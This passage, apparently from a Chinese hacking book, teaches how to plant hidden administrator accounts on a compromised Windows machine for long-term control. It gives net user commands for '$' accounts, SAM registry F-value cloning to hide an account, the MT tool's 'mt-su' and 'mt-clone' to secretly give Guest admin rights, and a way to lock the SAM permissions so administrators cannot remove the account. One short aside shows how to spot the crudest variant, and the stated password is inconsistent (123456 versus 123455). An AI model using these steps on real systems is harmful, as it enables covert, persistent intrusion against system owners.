5.1 通过账号入侵系统的常用手段
入侵计算机系统是黑客的首要任务,无论采用什么手段,只要入侵到目标主机的系统当中,那么这一台计算机就相当于是黑客的了。本节介绍几种常见的入侵计算机系统的方式。
5.1.1 使用DOS命令创建隐藏账号入侵系统
黑客在成功入侵一台主机后,会在该主机上建立隐藏账号,以方便长期控制该主机,下面介绍使用命令创建隐藏账号的操作步骤。
Step 01 单击【开始】按钮,选择【运行】命令,打开【运行】对话框,在【打开】文本框中输入“cmd”。
Step 02 单击【确定】按钮,打开【命令提示符】窗口,在其中输入“net user wyy$ 123456 /add”命令,然后按【Enter】键,即可成功创建一个名为“wyy$”、密码为“123455”的隐藏账号。
Step 03 输入“net localgroup administrators wyy$ /add”命令,然后按【Enter】键,即可对该隐藏账号赋予管理员权限。
Step 04 再次输入“net user”命令,按【Enter】键后,即可显示当前系统中所有已存在的账号信息,但是却发现刚刚创建的“wyy$”并没有显示。
由此可见,隐藏账号可以不被命令查看到,不过,用这种方法创建的隐藏账号并不能完美地隐藏。查看隐藏账号的具体操作步骤如下:
Step 01 在桌面上右击【计算机】图标,在弹出的快捷菜单中选择【管理】命令,打开【计算机管理】窗口。
Step 02 依次展开【系统工具】→【本地用户和组】→【用户】选项,这时在右侧的窗格中可以发现创建的“wyy$”隐藏账号依然会被显示。
提示: 这种隐藏用户的方法并不实用,只能做到在【命令提示符】窗口中隐藏,属于入门级的系统账户隐藏技术。
5.1.2 在注册表中创建隐藏账号入侵系统
注册表是Windows系统的数据库,包含系统中非常多的重要信息,也是黑客关注最多的地方。下面就来看看黑客是如何使用注册表更好地隐藏账号的。
Step 01 单击【开始】按钮,选择【运行】命令,打开【运行】对话框,在【打开】文本框中输入“regedit”。
Step 02 单击【确定】按钮,打开【注册表编辑器】窗口,右击“HKEY_LOCAL_MACHINE\SAM\SAM”注册表项,在弹出的快捷菜单中选择【权限】命令。
Step 03 打开【SAM的权限】对话框,在【组或用户名】栏中选择Administrators,然后在【Administrators的权限】栏中勾选【完全控制】和【读取】复选框,单击【确定】按钮保存设置。
Step 04 选择“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”项,可以查看到以当前系统中的所有系统账户名称命名的3个项。
Step 05 右击yczh$项,在弹出的快捷菜单中选择【导出】命令,然后单击【保存】按钮,即可导出yczh.reg。
Step 06 打开【导出注册表文件】对话框,将该项命名为“yczh.reg”。
Step 07 将“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”项下的“000001F4”和“000003EA”项分别导出并命名为“administrator.reg”和“user.reg”。
Step 08 用记事本打开“administrator.reg”,选中“F”之后的所有内容并复制,接着打开“user.reg”,将“F”之后的内容替换掉,完成后将“user.reg”进行保存。
Step 09 打开【命令提示符】窗口,输入“net user yczh$ /del”命令,然后按【Enter】键,即可将建立的隐藏账号“yczh$”删除。
Step 10 分别将“yczh.reg”和“user.reg”导入到注册表中,即可完成注册表隐藏账号的创建,在【本地用户和组】中也查看不到隐藏账号。
提示: 使用此方法创建的隐藏账号还是可以在注册表中查看到的。为了保证建立的隐藏账号不被管理员删除,还需要将注册表中“HKEY_LOCAL_MACHINE\SAM\SAM”项的权限取消。这样即便是经验丰富的管理员发现并要删除隐藏账号,系统也会报错,并且无法再次赋予权限,经验不足的管理员就只能束手无策了。
5.1.3 使用MT工具创建复制账号入侵系统
建立隐藏是入侵计算机系统后的重要工作,要建立隐藏的用户账号,最好的办法就是复制管理员账号,利用MT工具可以很轻松地创建复制账号。
具体的操作步骤如下:
Step 01 在进行账号复制前,先查看远程主机上的管理员的用户名信息。在远程主机的溢出窗口中输入命令“net localgroup administrators”,然后按【Enter】键执行该命令,即可看到所有管理员的用户名。
Step 02 查看远程主机上的“Guest”用户名信息。在远程主机的溢出窗口中输入命令“net user Guest”,然后按【Enter】键执行该命令,从执行结果中可以看出Guest用户账户没有启用,且密码为空。
Step 03 利用MT工具把“Guest”用户复制为具有与前面一个管理员账号相同的权限。在复制用户之前,需要获取系统的最高权限,在溢出窗口中输入“mt-su”命令。
Step 04 按【Enter】键执行该命令,打开新的【命令提示符】窗口,就可以获取系统的最高级别的System权限。
Step 05 在打开的新的【命令提示符】窗口中就可以进行账号的复制操作了。复制用户的参数为“-clone”,命令格式为“mt-clone <SourUser> <DestUser>”,其中“<SourUser>”表示要复制的源用户,“<DestUser>”表示目标用户。如果要将Guest复制为与“Administrator”用户相同的权限,就可以执行“mt-clone administrator guest”,执行完成后将返回如下信息:
Read value F from 1F4 of administrator.
Set value F to 1F5 of guest
Success!
上面显示的信息说明操作成功,此时已经将来宾组中的“Guest”用户复制成了管理员组的账户。
Step 06 在新打开的【命令提示符】窗口中输入“mt-chkuser”命令,按【Enter】键执行该命令,可以显示所有用户账户的SID值,从中可以看出Guest账号的“CheckedSID”值与“Administrator”账号的值是相同的,说明两个账号具有相同的权限,这样就在目标主机中建立了一个隐藏账户。
提示: 当“Guest”用户被添加到管理员用户组中后,就具有了与“Administrator”相同的管理员权限,但是在查看“Guest”用户信息时,显示的该用户依然是来宾组之中,而且是未启用的状态。事实上,该用户已经被暗中激活启用,并且当“Guest”账户被管理员禁用时,攻击者依然可以用“Guest”账户进行登录,执行管理员权限的操作。